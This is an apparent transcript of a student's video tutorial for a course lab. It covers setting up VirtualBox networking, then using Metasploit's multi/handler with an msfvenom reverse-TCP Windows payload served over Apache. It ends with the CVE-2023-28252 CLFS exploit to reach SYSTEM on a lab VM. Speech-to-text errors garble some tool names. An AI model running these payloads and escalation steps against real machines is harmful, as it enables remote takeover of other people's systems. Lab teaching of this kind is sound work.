Hi everyone. So I just got some requests on how to check how to set up your virtual box in order to make the Metasploit works on Kali and also your small machine or your local machine. So first of all, I think you need to set up the network correctly. For that, this is a bit complicated, so I'm just gonna be very frank about it. You need to start with creating a network. So how you do that? You go to File, you go to Settings, you go to Tools, and then you go to Network. You come to here, and then you go to Networks. After you come to networks, you need to come here and then just leave it by default lah. And then what you need to do is you need to go to your device. Actually, this one will do afterwards because this is very painful. I have so many again, I don't know. I just troubleshoot a lot of things. But if you want to do it simple, I think you just do bridge adapter. If you go to your networks, and then you go to here, you go to you click on bridge adapter, and then it should work right away. This setting you need to do it on all devices. So you need to go to every devices and then go to settings and then go click on bridge adapters. This is the easiest way you can do it. Or you can do it the hard way by you having the two adapters. One is for net for you to use the internet. Another one is just for the internal networking lah. So you can ping each other between the between virtual machine. So this one adapters usually you will have one, but if you want to, you can have two. You can need to enable this, and then you need to choose this for network. For net, just let it be. Okay. That's about it for Kali. Kali, I think there was a special thing that you need to do is if you go to networks, there's a thing called promiscuous mode. Let me see where it is. Yeah, promiscuous mode. So you need to click on this and allow VMs. This one allow. I don't think it's matter, but you can do this and then allow VMs. See, allow all. So this one it allows you to check other machine traffics and stuff. But this is for Kali only lah. Others you don't have to do it. So once you set up and then you boot up your two machine, you will come to here lah. So I'm gonna teach you on how to do the privilege escalation and how to set up the I'll show you how to set up the network first. First, the Kali itself, you will have your own you'll get the IP from DHCP, so you don't have to worry about it. So this is 10.0.2.4. This is automatically gotten from the DHCP server. So if you look at the network itself, it has this this is the network address with the 24 prefix, which mean you guys learn networking, so you guys know what it is. So port forwarding is just do the way that it is. I think you need to create two of them. One for your VM1 for Alice, and then second one for Bob. So you just put 10.0.2.40 and then this one like this. You just put this on. I'm not sure if this is needed, but I have tried so many things and this is the only thing that works. So just do it on your own. If it works on your own without setting this, then congratulations. So what you need to do right now is on Windows is you need to go to your network setting. Normally lah, I don't think they will give you right away the IP. If you do this is okay, this is network by the way. If you want to do this is network. If you use bridge adapter, you don't have to do this, but it won't works in a school. Just letting you guys know. So properties, and then you can do IPv4, and then you just select, you just put whatever address that you want. This one is just whatever address from 2 to 5, from 255 to 255. Just don't choose the one that is already chosen by Kali A. You just choose whatever, and then the default gateway you choose whatever lah. I'm sorry, the default gateway is normally the first IP lah, first usable IP. Just choose the 10.0.2.1. That's okay already. So that's it for the Windows side. You have to do that, and then you have to also verify that it also work. It works as well. So how do you verify if it works? You just ip config/all, and then you check the. This one is your local IP lah. This one won't change. This one will change. This one will this is your network IP. This is different for different virtual machine, and you can test it by pinging the other devices. Like, let's say I want to ping the Kali devices, I can ping the number 4. It works. I want to ping the the gateway IP. It works also. Yeah, that's basically it. Okay. The next thing you need to do, I think that's about it for the networking. If you can do that, basically you can do, what's the next step is, you just have to make sure that each devices can ping each other, and then that's about it. That's mean that it is in the same network. If you want to do like the host only, then I hope you good luck because that one doesn't have internet, so you have to basically do this way to force yourself do this way, because you need to send email as well so that's like the only way that can do it. Though this is like yeah, I'll teach it later. So what we need to do right now is, this is the fundamental of Metasploit. So we need to clear first, and then we'll start with the MSF console, which is the Metasploit console that you're gonna use for this entire project. So this is fundamental for your work. We will start with the use exploit multi-handler to use it for handle the traffics that whenever if we will do a reverse shell from the Windows machine back to the Kali machine lah. So we'll do use exploit multi-handler, and then press enter. You'll do this one will need to do the payloads. So we first show the option first. I will show you why do we need to change the payloads. So by default right now, right, you see that it says that generic, it uses the payload generic shell reverse TCP. It also says it's like here. But what we need to do is we need to use a specific one that is for Windows and is for 64-bit, because the one that we use right now is 64-bit, so we need to use 64-bit. So we just change it. We just change the payload to Windows x64 Metasploit reverse TCP, like this, and then enter. And then you need to set the local port number, second local host number, which is the one that is in in this Kali devices, which is 10.0.2.4. And then you set the local port, which is whatever lah, but for easy sake, you just put it as 4444. And then we can run the exploit. To run the exploit, you can run either run or you can run exploit. But just run. I think it's not that much different either way. Okay. So the second thing we need to do is generate a payload. But to generate a payload, you need to use NSF Venom to generate the payload, and that is this one. This command I will finish typing first, and then I'll explain how it works. Metasploit reverse TCP L host equals to 10.0.2.4 L port 4444 f exe dash var www html dash mainnet exe. Okay, so MSF Venom is a payload generation command that is from Metasploit. You just this dash p is just choosing the kind of payload that we want to use. It's the same kind of payload that we use in that we used here set payload Metasploit, set payload Windows yeah, set payload so this one have to be the same on here. It need to be the same on here. The L host it need to be the same as these current devices as we also set it on NSF console. Port also the same. The f is the output type that you want. So you can either use PowerShell command, which is psh -cmd. That's it. But if you want to do it like this, you have to do -f and then -o dot and then -f is the format, and then -o is the output where you want to put the output at. This is exclusively only for exe. So for this command you need to do sudo because this is /var /www /html that directory requires you to have a sudo command to a sudo privilege to in order to create a file over there. This is for the website later that user will be downloading the file from. You can do this and then put your password in. I think I typed the wrong password in. No, it's correct. So once you're here, right, you need to do sudo systemctl start Apache 2 as well. And then that's it. And then when you go over to your machine, if you type your Kali machine IP and then you -4 and then you do /main.exe, which is exactly what this is. You just put it at the extension at the end after the IP and then with a slash. Boom, you will download the file over here. So once you download the file over here, this one will start a once you got the file, you just have to let me delete this. If you, let's say we delete this delete. Settings. Okay, since we already have that, but basically when you click on the file, right, click on main.exe, this one you will start when the exploit started, right, you only will you have this only when you click on the main.exe and then to start the reverse shell back to the Kali machine. So the Windows machine will start a reverse shell that is requesting a Kali machine to listen to the Windows machine in order to start a connection. So we have a connection here. This is right now we only have a get user ID. We will have the local machine only. Local user account, which is window vm2/vm1. This is basically the same user. Sorry, wait. I'm using Bob. No, this is VM2. So if you, let's say if I execute -f how.exe, it will just spawn a calculator here. So that's about it. If you can do this, you basically can do the next step already. So what's the next step is you need to do a privilege escalation, which involve you getting into the anti-authority user. So what I found that works is this particular exploit. CVE 2023-28-252. So this exploit uses the Windows Common Log file system drivers to drive the privilege escalation. So I have checked the validity of this exploit. It works until our version 20H2 lah. So how do you check your version is by doing CMD. I think not CMD, it's PowerShell. You do PowerShell and then you type hold on winver. When you type it, you can see that the version is 20H2 and then the OS build is 19.042 point this one. This one needs to be specific that you got this. If you got another one, I think it will still work. If it doesn't, then you have to find another exploit. Just download the one that is gotten from the wait, hold on. Let me check. Let me get you the this one. You go to the Google Classroom and then you go to digital forensic practical assignment, this one, and then you go to guides. You go to guides and then you go to sorry, not guides, the Windows ISO. You just download this one. This one will I tested it and it works. And then just paste in the serial key lah. Okay, so right now we can start to do the exploit. So how do you do the exploit? We will not need to go back to the Kali machine and then we do background first to make the session in go on to the background. So it will says that backgrounding session 1, which the previous session here it is designated as session 1. So you have to take notes of that. Take notes on that. If it says that it's session 2 and then you backgrounding the session 2 and then it's the same connection, then you have to put session 2 later on. So the exploit that we're gonna use right now, how do you search it? How do you search if the exploit exists? Is it by doing use exploit and then Windows and then local. You can press your tab button and then you press twice, it will say so display all 100 possibilities. You say yes, and then it will show you all the CVEs out here. As you can see, the CVE that I mentioned just now, right, is CVE 2023-28252, and 2022-28252 is here. So here you can do just type in CVE 2022 2023 28252 28252 CLS and then drivers use, and then that's it. But also just this, and then you need to set your set your L so you need to set the option again. So see the option again. What is it? So I think it's almost the same, but one thing is you need to set the session. Right now the current setting is -1, which is not the setting that we want to see, because our session is number 1. The number, it depends on the session that you are backgrounding on. If you're backgrounding from 3, then you put 3. Then if you're backgrounding from 2, then you put 2. Set the session to number 1. Number 1 for me lah. So when you show option again, you'll see that the option is number 1. The session is number 1 now. I think that's basically what you need to do, and then you can just do run. And this one will run the exploit. Yeah. So right now it spawned another session, interpreter session, that is if we get user ID, it will show us that we are on NT authorities /system. That basically means that we have the kind of equivalent to a Linux system, which is represented by the root account. Windows operating system also have a root account, which root equivalent, which is anti-authority slash system. This is the one that we want to use, and this is also mentioned by Sir, and I have confirmed with him just now that he said that both are fine for the admin account. Hold on, let me hold it. I have asked that about this. Either is if it's fine, if it's just we have the admin privilege from another account. He said it is fine, but as long as as long as the admin it is admin above. But the best is anti-authority slash system. If it can replicate this is you're gonna get a better marks. I'm not sure if you get a better marks, but it's the best for you to have this. So that's about it. There might be something that you need to add on if Metasploit that you are using is old and doesn't have the module that I mentioned just now. You need to do a upgrade on your Kali machine. So how you do it is by doing sudo apt update. Yeah, sudo apt update. Yeah, so you will roll order it. I mean, since I already updated, so I don't have to do it. But if you see that it's updated, then it's okay. But we have to do another step, which is apt full upgrade. Not just upgrade. You need to do full upgrade to upgrade all of the things. This one, once you update it, it will take a long time to load it up, but it's worth it because you know that your Kali is having the full updates. It's the full upgrades. If it's like your first startup, right, it's gonna take like around 20 to 30 minutes, depending on your network speed, lah. Yeah. So that's basically it. Auto remove. So that's basically if you got any kind of like errors, right, or any kind of problems, you let me know, or you can try to see your issue first. What if it's working on your end? There's another method, like just now I mentioned about PowerShell, right? You can also do PowerShell on MSF Venom to generate the payload. All right, that's it about it. And I think, yeah, also, yeah, forgot to mention about the port forwarding. So the port forwarding, you just have to put yeah, if I think I mentioned it, and I'll mention again. So the port forwarding, you go to networks and then you go port forwarding. You put every of your Windows machine IP. For each of them, you put it one here and then one here, another one here, and then the put host port 444. This is for Kali. Kali is gonna be the same for all of them. So this one, you add another one just like this, and then you put whatever lah. What's your IP 10.0.2.10 or something, and then you put 4444, and then this one you put 4, and then 4444, and then apply. Then it's gonna be able to do the thing lah. But I don't. It's not necessary. I mean, you can do this if you want. It's not necessary. You can also try this if the whole setup doesn't work. You can't ping each other, or the the Metasploit doesn't work, then you can do this. So yeah, the important things is you can achieve the anti-authority user account. Alright, thank you and see you tomorrow. Actually, not tomorrow. Today is Sunday. Yeah, just PM me on 0189606 whatever fuck. Just PM me on @Daryl actually. Don't I'm gonna upload this to YouTube.